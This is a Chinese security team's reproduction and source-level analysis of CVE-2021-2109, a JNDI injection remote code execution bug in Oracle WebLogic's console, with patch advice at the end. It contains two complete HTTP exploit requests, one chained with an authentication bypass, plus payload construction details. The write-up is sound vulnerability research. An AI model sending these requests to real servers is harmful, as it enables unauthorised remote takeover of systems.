CVE-2021-2109:Weblogic远程代码执行分析复现

  • A+
所属分类:安全文章
上方蓝色字体关注我们,一起学安全!
作者:Whippet@Timeline Sec
本文字数:2006
阅读时长:7~8min
声明:请勿用作违法用途,否则后果自负


0x01 简介

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。


0x02 漏洞概述
编号:CVE-2021-2109
Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。


0x03 影响版本
  • WebLogic 10.3.6.0.0

  • WebLogic 12.1.3.0.0

  • WebLogic 12.2.1.3.0

  • WebLogic 12.2.1.4.0

  • WebLogic 14.1.1.0.0


0x04 环境搭建

CVE-2020-14645复现时的搭建方式相同


0x05 漏洞复现

选用jdk-8u181,weblogic12.1.4.0
搭建漏洞环境,因为是通过 JNDI 注入进行的远程命令执行,所以会受到 JDK 版本的影响


JNDI 注入的 JDK 版本如图所示


CVE-2021-2109:Weblogic远程代码执行分析复现


下载 weblogic 安装包后,以管理员身份打开cmd控制台

执行完下面命令后,一路next就好

java -jar fmw_12.2.1.4.0_wls_lite_generic.jar

 
安装完成之后,启动

C:OracleMiddlewareOracle_Homeuser_projectsdomainsbase_domainstartWebLogic.cmd


就可以启动 Weblogic


CVE-2021-2109:Weblogic远程代码执行分析复现


设置调试的话修改

user_project/domains/bin目录中

setDomainEnv.cmd或者setDomainEnv.sh文件

在if "%debugFlag%"=="true" 前加入

set debugFlag=true


CVE-2021-2109:Weblogic远程代码执行分析复现


在同一文件中,通过set DEBUG_PORT=8453

指定了远程调试的端口,拷贝Oracle_Home目录下所有文件至调试目录,配置 Remote 方式进行远程调试,端口为 8453


CVE-2021-2109:Weblogic远程代码执行分析复现


利用 JNDI 注入工具生成payload

https://github.com/welk1n/JNDI-Injection-Exploit


CVE-2021-2109:Weblogic远程代码执行分析复现


登录 weblogic 控制台,发送数据包


POST /console/consolejndi.portal HTTP/1.1Host: 192.168.176.167:7001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Referer: http://192.168.176.167:7001/console/css/%252e%252e%252f/consolejndi.portalAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedCookie: ADMINCONSOLESESSION=Dxo4Mj2wREQ8hHIy7WpBfolb35JVathlBeQhVN6hjuJCRzKBUGDi!-1446449740Connection: closeContent-Length: 163
_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.176;1:1389/pq2ld0;AdminServer%22)


CVE-2021-2109:Weblogic远程代码执行分析复现


CVE-2021-2109:Weblogic远程代码执行分析复现


可以结合CVE-2020-14882权限绕过漏洞,删除cookie,重新构造数据包


POST /console/css/%252e%252e%252f/consolejndi.portal HTTP/1.1Host: 192.168.176.167:7001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Referer: http://192.168.176.167:7001/console/css/%252e%252e%252f/consolejndi.portalAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 163
_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.176;1:1389/pq2ld0;AdminServer%22)


0x06 漏洞分析

我们注意到漏洞poc中包含类

com.bea.console.handles.JndiBindingHandle

我们就在其中添加断点


console.jar!com.bea.console.handles.JndiBindingHandle#JndiBindingHandle(java.lang.String)


CVE-2021-2109:Weblogic远程代码执行分析复现


我们注意到JndiBindingHandle是一些初始化操作,进行实例化。


我们查看

Oracle_Home/wlserver/server/lib/consoleapp/webapp/consolejndi.portal文件,发现标签 JNDIBindingPageGeneral 指定的路径是 /PortalConfig/jndi/jndibinding.portlet


CVE-2021-2109:Weblogic远程代码执行分析复现


跟进文件 jndibinding.portlet

看到程序最终调用 JNDIBindingAction 类
Oracle_Home/wlserver/server/lib/consoleapp/webapp/PortalConfig/jndi/jndicontext.portlet


CVE-2021-2109:Weblogic远程代码执行分析复现


我们在 JNDIBindingAction 类的函数 execute 中,看到了 JNDI 注入的关键函数 lookup,通过 lookup 去引用命名服务(RMI)和目录服务(LDAP)

console.jar!com.bea.console.actions.jndi.JNDIBindingAction#execute


CVE-2021-2109:Weblogic远程代码执行分析复现


我们可以看到 lookup 中的值来源于 bindingHandle.getContext() + bindingHandle.getBinding() ,同时要执行到 lookup 需要满足 serverMBean != null ,serverName 的值来自 bindingHandle.getServer()


ServerMBean serverMBean = MBeanUtils.getAnyServerMBean(serverName);
console.jar!ccom.bea.console.utils.MBeanUtils#getAnyServerMBean(java.lang.String)


CVE-2021-2109:Weblogic远程代码执行分析复现


跟进lookupServer
com.oracle.weblogic.management.beanimpls.jar!weblogic.management.configuration.DomainMBeanImpl#lookupServer


CVE-2021-2109:Weblogic远程代码执行分析复现


在这里如果要满足有返回值的,传入的值必须等于 bean.getName() ,通过获取 this._Servers[0].getName() 可以得到这个值为 AdminServer


满足了执行条件之后,我们继续返回 JNDIBindingAction#execute 查看 lookup 函数中的参数的传入来自于


而context、bindName、serverName的值都是从bindingHandle中获取的,正巧我们可以控制JndiBindingHandle实例化的值(objectIdentifier),接着来就需要看下objectIdentifier和以上3个值有什么关系了,看一下3个成员变量的get函数,发现他们都和Component有关,


console.jar!com.bea.console.handles.JndiBindingHandle


CVE-2021-2109:Weblogic远程代码执行分析复现


跟进 getComponent
console.jar!com.bea.console.handles.HandleImpl#getComponent


CVE-2021-2109:Weblogic远程代码执行分析复现


跟进 getComponents
console.jar!com.bea.console.handles.HandleImpl#getComponents


CVE-2021-2109:Weblogic远程代码执行分析复现


我们可以看到函数 getComponents  就是通过  this.getObjectIdentifier() 获取 objectIdentifier 的值,进而通过分号 ; 分隔开来,并将分割后的数据填入 String 数组。我们想要控制的参数都可以通过控制  objectIdentifier 的值来实现。this.objectIdentifier 是在 JndiBindingHandle 类中的构造函数中初始化的。


console.jar!com.bea.console.utils.HandleUtils#handleFromQueryString


CVE-2021-2109:Weblogic远程代码执行分析复现


会获取参数中以 handle 为结尾的键值,再根据 request 请求的参数生产 handle 对象
console.jar!ccom.bea.console.handles.HandleConverter#convert


CVE-2021-2109:Weblogic远程代码执行分析复现


console.jar!com.bea.console.handles.HandleFactory#getHandle


CVE-2021-2109:Weblogic远程代码执行分析复现


所以我们在请求中设置
JndiBindingHandlehandle=com.bea.console.handles.JndiBindingHandle("ldap://127.0.0.1:1389/Evil"), lookup中的参数有两个,会将两个参数用.拼接起来,所以我们可以将 ldap://127.0.0.1:1389/Evil 中的任意一个 . 替换为 ;  同时还需要让serverName = AdminServer ,所以最后为 JndiBindingHandlehandle=com.bea.console.handles.JndiBindingHandle("ldap://127.0.0;1:1389/Evil;AdminServer")


0x07 修复方式


1、升级Weblogic Server运行环境的JDK版本;


2、升级官方安全补丁,参考Oracle官网发布的补丁:Oracle Critical Patch Update Advisory - January 2021

https://www.oracle.com/security-alerts/cpujan2021.html


参考链接:
https://github.com/welk1n/JNDI-Injection-Exploit
https://www.oracle.com/security-alerts/cpujan2021.html



CVE-2021-2109:Weblogic远程代码执行分析复现

CVE-2021-2109:Weblogic远程代码执行分析复现
阅读原文看更多复现文章
Timeline Sec 团队
安全路上,与你并肩前行




本文始发于微信公众号(Timeline Sec):CVE-2021-2109:Weblogic远程代码执行分析复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: